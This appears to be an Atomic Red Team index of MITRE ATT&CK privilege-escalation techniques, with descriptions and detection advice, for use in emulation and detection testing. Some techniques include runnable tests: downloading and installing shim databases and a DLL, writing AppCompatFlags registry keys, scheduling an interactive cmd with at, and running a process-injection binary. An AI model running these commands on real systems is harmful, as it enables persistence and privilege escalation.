elevation_required: true - T1546.011: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.011 - url: https://attack.mitre.org/techniques/T1546/011 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - - source_name: FireEye Application Shimming - url: http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf - description: Ballenthin, W., Tomczak, J.. (2015). The Real Shim Shary. Retrieved - May 4, 2020. - - url: https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf - description: Pierce, Sean. (2015, November). Defending Against Malicious Application - Compatibility Shims. Retrieved June 22, 2017. - source_name: Black Hat 2015 App Shim - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Application Shimming - description: "Adversaries may establish persistence and/or elevate privileges - by executing malicious content triggered by application shims. The Microsoft - Windows Application Compatibility Infrastructure/Framework (Application Shim) - was created to allow for backward compatibility of software as the operating - system codebase changes over time. For example, the application shimming feature - allows developers to apply fixes to applications (without rewriting code) - that were created for Windows XP so that it will work with Windows 10. (Citation: - Endgame Process Injection July 2017)\n\nWithin the framework, shims are created - to act as a buffer between the program (or more specifically, the Import Address - Table) and the Windows OS. When a program is executed, the shim cache is referenced - to determine if the program requires the use of the shim database (.sdb). - If so, the shim database uses hooking to redirect the code as necessary in - order to communicate with the OS. \n\nA list of all shims currently installed - by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb - and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom - databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom - and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo - keep shims secure, Windows designed them to run in user mode so they cannot - modify the kernel and you must have administrator privileges to install a - shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) - (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data - Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), - and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims - may allow an adversary to perform several malicious acts such as elevate privileges, - install backdoors, disable defenses like Windows Defender, etc. (Citation: - FireEye Application Shimming) Shims can also be abused to establish persistence - by continuously being invoked by affected programs." - id: attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-05-04T19:05:30.140Z' - created: '2020-01-24T14:56:24.231Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - x_mitre_detection: |- - There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim): - - * Shim-Process-Scanner - checks memory of every running process for any shim flags - * Shim-Detector-Lite - detects installation of custom shim databases - * Shim-Guard - monitors registry for any shim installations - * ShimScanner - forensic tool to find active shims in memory - * ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot) - - Monitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse. - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Windows Registry - x_mitre_platforms: - - Windows - identifier: T1546.011 - atomic_tests: - - name: Application Shim Installation - auto_generated_guid: 9ab27e22-ee62-4211-962b-d36d9a0e6a18 - description: "Install a shim database. This technique is used for privilege - escalation and bypassing user access control.\nUpon execution, \"Installation - of AtomicShim complete.\" will be displayed. To verify the shim behavior, - run \nthe AtomicTest.exe from the \\\\T1546.011\\\\bin - directory. You should see a message box appear\nwith \"Atomic Shim DLL Test!\" - as defined in the AtomicTest.dll. To better understand what is happening, - review\nthe source code files is the \\\\T1546.011\\\\src - directory.\n" - supported_platforms: - - windows - input_arguments: - file_path: - description: Path to the shim database file - type: String - default: PathToAtomicsFolder\T1546.011\bin\AtomicShimx86.sdb - dependency_executor_name: powershell - dependencies: - - description: 'Shim database file must exist on disk at specified location - (#{file_path}) - -' - prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - -' - get_prereq_command: | - [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" - - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll - -' - prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit - 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll - executor: - command: 'sdbinst.exe #{file_path} - -' - cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 - -' - name: command_prompt - elevation_required: true - - name: New shim database files created in the default shim database directory - auto_generated_guid: aefd6866-d753-431f-a7a4-215ca7e3f13d - description: | - Upon execution, check the "C:\Windows\apppatch\Custom\" folder for the new shim database - - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - supported_platforms: - - windows - executor: - command: | - Copy-Item $PathToAtomicsFolder\T1546.011\bin\T1546.011CompatDatabase.sdb C:\Windows\apppatch\Custom\T1546.011CompatDatabase.sdb - Copy-Item $PathToAtomicsFolder\T1546.011\bin\T1546.011CompatDatabase.sdb C:\Windows\apppatch\Custom\Custom64\T1546.011CompatDatabase.sdb - cleanup_command: | - Remove-Item C:\Windows\apppatch\Custom\T1546.011CompatDatabase.sdb -ErrorAction Ignore - Remove-Item C:\Windows\apppatch\Custom\Custom64\T1546.011CompatDatabase.sdb -ErrorAction Ignore - name: powershell - elevation_required: true - - name: Registry key creation and/or modification events for SDB - auto_generated_guid: 9b6a06f9-ab5e-4e8d-8289-1df4289db02f - description: | - Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing - the registry keys that were created. These keys can also be viewed using the Registry Editor. - - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - supported_platforms: - - windows - executor: - command: | - New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1546.011" -Value "AtomicRedTeamT1546.011" - New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1546.011" -Value "AtomicRedTeamT1546.011" - cleanup_command: | - Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1546.011" -ErrorAction Ignore - Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1546.011" -ErrorAction Ignore - name: powershell - elevation_required: true - T1055.004: - technique: - external_references: - - source_name: mitre-attack - external_id: T1055.004 - url: https://attack.mitre.org/techniques/T1055/004 - - url: https://msdn.microsoft.com/library/windows/desktop/ms681951.aspx - description: Microsoft. (n.d.). Asynchronous Procedure Calls. Retrieved December - 8, 2017. - source_name: Microsoft APC - - url: https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/ - description: Gavriel, H. & Erbesfeld, B. (2018, April 11). New ‘Early Bird’ - Code Injection Technique Discovered. Retrieved May 24, 2018. - source_name: CyberBit Early Bird Apr 2018 - - url: https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows - description: 'Liberman, T. (2016, October 27). ATOMBOMBING: BRAND NEW CODE - INJECTION FOR WINDOWS. Retrieved December 8, 2017.' - source_name: ENSIL AtomBombing Oct 2016 - - url: https://msdn.microsoft.com/library/windows/desktop/ms649053.aspx - description: Microsoft. (n.d.). About Atom Tables. Retrieved December 8, 2017. - source_name: Microsoft Atom Table - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Asynchronous Procedure Call - description: "Adversaries may inject malicious code into processes via the asynchronous - procedure call (APC) queue in order to evade process-based defenses as well - as possibly elevate privileges. APC injection is a method of executing arbitrary - code in the address space of a separate live process. \n\nAPC injection is - commonly performed by attaching malicious code to the APC Queue (Citation: - Microsoft APC) of a process's thread. Queued APC functions are executed when - the thread enters an alterable state.(Citation: Microsoft APC) A handle to - an existing victim process is first created with native Windows API calls - such as OpenThread. At this point QueueUserAPC can - be used to invoke a function (such as LoadLibrayA pointing to - a malicious DLL). \n\nA variation of APC injection, dubbed \"Early Bird injection\", - involves creating a suspended process in which malicious code can be written - and executed before the process' entry point (and potentially subsequent anti-malware - hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: - ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke - malicious code previously written to the global atom table.(Citation: Microsoft - Atom Table)\n\nRunning code in the context of another process may allow access - to the process's memory, system/network resources, and possibly elevated privileges. - Execution via APC injection may also evade detection from security products - since the execution is masked under a legitimate process. " - id: attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:17:05.394Z' - created: '2020-01-14T01:29:43.786Z' - x_mitre_defense_bypassed: - - Application control - - Anti-virus - x_mitre_data_sources: - - Process monitoring - - API monitoring - x_mitre_detection: "Monitoring Windows API calls indicative of the various types - of code injection may generate a significant amount of data and may not be - directly useful for defense unless collected under specific circumstances - for known bad sequences of calls, since benign use of API functions may be - common and difficult to distinguish from malicious behavior. Windows API calls - such as SuspendThread/SetThreadContext/ResumeThread, - QueueUserAPC/NtQueueApcThread, and those that can - be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, - may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze - process behavior to determine if a process is performing actions it usually - does not, such as opening network connections, reading files, or other suspicious - actions that could relate to post-compromise behavior. " - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Windows - identifier: T1055.004 - atomic_tests: - - name: Process Injection via C# - auto_generated_guid: 611b39b7-e243-4c81-87a4-7145a90358b1 - description: | - Process Injection using C# - reference: https://github.com/pwndizzle/c-sharp-memory-injection - Excercises Five Techniques - 1. Process injection - 2. ApcInjectionAnyProcess - 3. ApcInjectionNewProcess - 4. IatInjection - 5. ThreadHijack - Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 techniques. Output will be via stdout. - supported_platforms: - - windows - input_arguments: - exe_binary: - description: Output Binary - type: Path - default: PathToAtomicsFolder\T1055.004\bin\T1055.exe - executor: - command: "#{exe_binary}\n" - name: command_prompt - T1053.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1053.001 - url: https://attack.mitre.org/techniques/T1053/001 - - source_name: Kifarunix - Task Scheduling in Linux - url: https://kifarunix.com/scheduling-tasks-using-at-command-in-linux/ - description: Koromicha. (2019, September 7). Scheduling tasks using at command - in Linux. Retrieved December 3, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: At (Linux) - description: |- - Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux) - - An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account. - id: attack-pattern--6636bc83-0611-45a6-b74f-1f3daf635b8e - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-23T22:35:13.112Z' - created: '2019-12-03T12:59:36.749Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_remote_support: true - x_mitre_detection: "Monitor scheduled task creation using command-line invocation. - Legitimate scheduled tasks may be created during installation of new software - or through system administration functions. Look for changes to tasks that - do not correlate with known software, patch cycles, etc. \n\nSuspicious program - execution through scheduled tasks may show up as outlier processes that have - not been seen before when compared against historical data. Data and events - should not be viewed in isolation, but as part of a chain of behavior that - could lead to other activities, such as network connections made for Command - and Control, learning details about the environment through Discovery, and - Lateral Movement." - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - x_mitre_platforms: - - Linux - identifier: T1053.001 - atomic_tests: - - name: At - Schedule a job - auto_generated_guid: 7266d898-ac82-4ec0-97c7-436075d0d08e - description: 'This test submits a command to be run in the future by the `at` - daemon. - -' - supported_platforms: - - linux - input_arguments: - time_spec: - description: Time specification of when the command should run - type: String - default: now + 1 minute - at_command: - description: The command to be run - type: String - default: echo Hello from Atomic Red Team - dependency_executor_name: sh - dependencies: - - description: 'The `at` and `atd` executables must exist in the PATH - -' - prereq_command: 'which at && which atd - -' - get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found - in the PATH (Package name: `at`)'' - -' - - description: 'The `atd` daemon must be running - -' - prereq_command: 'systemctl status atd || service atd status - -' - get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service - atd start` ; systemd: `systemctl start atd`)'' - -' - executor: - name: sh - elevation_required: false - command: 'echo "#{at_command}" | at #{time_spec} - -' - T1053.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1053.002 - url: https://attack.mitre.org/techniques/T1053/002 - - url: https://twitter.com/leoloobeek/status/939248813465853953 - description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved - December 12, 2017. - source_name: Twitter Leoloobeek Scheduled Task - - url: https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen - description: Satyajit321. (2015, November 3). Scheduled Tasks History Retention - settings. Retrieved December 12, 2017. - source_name: TechNet Forum Scheduled Task Operational Setting - - url: https://technet.microsoft.com/library/dd315590.aspx - description: Microsoft. (n.d.). General Task Registration. Retrieved December - 12, 2017. - source_name: TechNet Scheduled Task Events - - source_name: Microsoft Scheduled Task Events Win10 - url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events - description: Microsoft. (2017, May 28). Audit Other Object Access Events. - Retrieved June 27, 2019. - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: At (Windows) - description: "Adversaries may abuse the at.exe utility to perform - task scheduling for initial or recurring execution of malicious code. The - [at](https://attack.mitre.org/software/S0110) utility exists as an executable - within Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/S0110) - requires that the Task Scheduler service be running, and the user to be logged - on as a member of the local Administrators group. \n\nAn adversary may use - at.exe in Windows environments to execute programs at system - startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) - can also be abused to conduct remote Execution as part of Lateral Movement - and or to run a process under the context of a specified account (such as - SYSTEM).\n\nNote: The at.exe command line utility has been deprecated - in current versions of Windows in favor of schtasks." - id: attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T13:43:40.776Z' - created: '2019-11-27T13:52:45.853Z' - x_mitre_data_sources: - - File monitoring - - Process command-line parameters - - Process monitoring - - Windows event logs - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_remote_support: true - x_mitre_permissions_required: - - Administrator - x_mitre_detection: |- - Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. - - Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10) - - * Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered - * Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated - * Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted - * Event ID 4698 on Windows 10, Server 2016 - Scheduled task created - * Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled - * Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled - - Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns) - - Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. - x_mitre_platforms: - - Windows - identifier: T1053.002 - atomic_tests: - - name: At.exe Scheduled task - auto_generated_guid: 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 - description: | - Executes cmd.exe - Note: deprecated in Windows 8+ - - Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time. - supported_platforms: - - windows - executor: - name: command_prompt - elevation_required: false - command: 'at 13:20 /interactive cmd - -' - T1547.002: - technique: - id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec - description: |- - Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages) - - Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication Packages"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded. - name: Authentication Package - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1547.002 - url: https://attack.mitre.org/techniques/T1547/002 - - url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx - description: Microsoft. (n.d.). Authentication Packages. Retrieved March 1, - 2017. - source_name: MSDN Authentication Packages - - url: http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html - description: Graeber, M. (2014, October). Analysis of Malicious Security Support - Provider DLLs. Retrieved March 1, 2017. - source_name: Graeber 2014 - - url: https://technet.microsoft.com/en-us/library/dn408187.aspx - description: Microsoft. (2013, July 31). Configuring Additional LSA Protection. - Retrieved June 24, 2015. - source_name: Microsoft Configure LSA - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-25T15:11:25.821Z' - created: '2020-01-24T14:54:42.757Z' - x_mitre_platforms: - - Windows - x_mitre_data_sources: - - DLL monitoring - - Windows Registry - - Loaded DLLs - x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys. - Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 - R2 may generate events when unsigned DLLs try to load into the LSA by setting - the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\LSASS.exe with AuditLevel = 8. (Citation: Graeber - 2014) (Citation: Microsoft Configure LSA)' - x_mitre_permissions_required: - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - atomic_tests: [] - T1547: - technique: - id: attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf - description: |- - Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)  These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. - - Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges. - name: Boot or Logon Autostart Execution - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1547 - url: https://attack.mitre.org/techniques/T1547 - - external_id: CAPEC-564 - source_name: capec - url: https://capec.mitre.org/data/definitions/564.html - - url: http://msdn.microsoft.com/en-us/library/aa376977 - description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November - 12, 2014. - source_name: Microsoft Run Key - - url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx - description: Microsoft. (n.d.). Authentication Packages. Retrieved March 1, - 2017. - source_name: MSDN Authentication Packages - - url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx - description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018. - source_name: Microsoft TimeProvider - - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order - description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence, - Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.' - source_name: Cylance Reg Persistence Sept 2013 - - source_name: Linux Kernel Programming - url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf - description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel - Module Programming Guide. Retrieved April 6, 2018. - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-10-09T16:05:36.772Z' - created: '2020-01-23T17:46:59.535Z' - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_detection: "Monitor for additions or modifications of mechanisms that - could be used to trigger autostart execution, such as relevant additions to - the Registry. Look for changes that are not correlated with known updates, - patches, or other planned administrative activity. Tools such as Sysinternals - Autoruns may also be used to detect system autostart configuration changes - that could be attempts at persistence.(Citation: TechNet Autoruns) Changes - to some autostart configuration settings may happen under normal conditions - when legitimate software is installed. \n\nSuspicious program execution as - autostart programs may show up as outlier processes that have not been seen - before when compared against historical data.To increase confidence of malicious - activity, data and events should not be viewed in isolation, but as part of - a chain of behavior that could lead to other activities, such as network connections - made for Command and Control, learning details about the environment through - Discovery, and Lateral Movement.\n\nMonitor DLL loads by processes, specifically - looking for DLLs that are not recognized or not normally loaded into a process. - Look for abnormal process behavior that may be due to a process loading a - malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line - parameters involved in kernel modification or driver installation." - x_mitre_permissions_required: - - User - - Administrator - - root - x_mitre_is_subtechnique: false - x_mitre_version: '1.1' - atomic_tests: [] - T1037: - technique: - id: attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Boot or Logon Initialization Scripts - description: "Adversaries may use scripts automatically executed at boot or - logon initialization to establish persistence. Initialization scripts can - be used to perform administrative functions, which may often execute other - programs or send information to an internal logging server. These scripts - can vary based on operating system and whether applied locally or remotely. - \ \n\nAdversaries may use these scripts to maintain persistence on a single - system. Depending on the access configuration of the logon scripts, either - local credentials or an administrator account may be necessary. \n\nAn adversary - may also be able to escalate their privileges since some boot or logon initialization - scripts run with higher privileges." - external_references: - - source_name: mitre-attack - external_id: T1037 - url: https://attack.mitre.org/techniques/T1037 - - external_id: CAPEC-564 - source_name: capec - url: https://capec.mitre.org/data/definitions/564.html - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-08-03T16:47:37.240Z' - created: '2017-05-31T21:30:38.910Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - macOS - - Windows - - Linux - x_mitre_detection: Monitor logon scripts for unusual access by abnormal users - or at abnormal times. Look for files added or modified by unusual accounts - outside of normal administration duties. Monitor running process for actions - that could be indicative of abnormal programs or executables running upon - logon. - x_mitre_data_sources: - - File monitoring - - Process monitoring - x_mitre_version: '2.1' - atomic_tests: [] - T1548.002: - technique: - id: attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073 - description: |- - Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works) - - If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows) - - Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as: - - * eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit) - - Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass) - name: Bypass User Account Control - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1548.002 - url: https://attack.mitre.org/techniques/T1548/002 - - url: https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works - description: Lich, B. (2016, May 31). How User Account Control Works. Retrieved - June 3, 2016. - source_name: TechNet How UAC Works - - url: https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx - description: 'Russinovich, M. (2009, July). User Account Control: Inside Windows - 7 User Account Control. Retrieved July 26, 2016.' - source_name: TechNet Inside UAC - - url: https://msdn.microsoft.com/en-us/library/ms679687.aspx - description: Microsoft. (n.d.). The COM Elevation Moniker. Retrieved July - 26, 2016. - source_name: MSDN COM Elevation - - url: http://www.pretentiousname.com/misc/win7_uac_whitelist2.html - description: Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November - 12, 2014. - source_name: Davidson Windows - - url: https://github.com/hfiref0x/UACME - description: UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016. - source_name: Github UACMe - - url: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ - description: Nelson, M. (2016, August 15). "Fileless" UAC Bypass using eventvwr.exe - and Registry Hijacking. Retrieved December 27, 2016. - source_name: enigma0x3 Fileless UAC Bypass - - url: https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware - description: Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses - UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016. - source_name: Fortinet Fareit - - url: http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass - description: Medin, T. (2013, August 8). 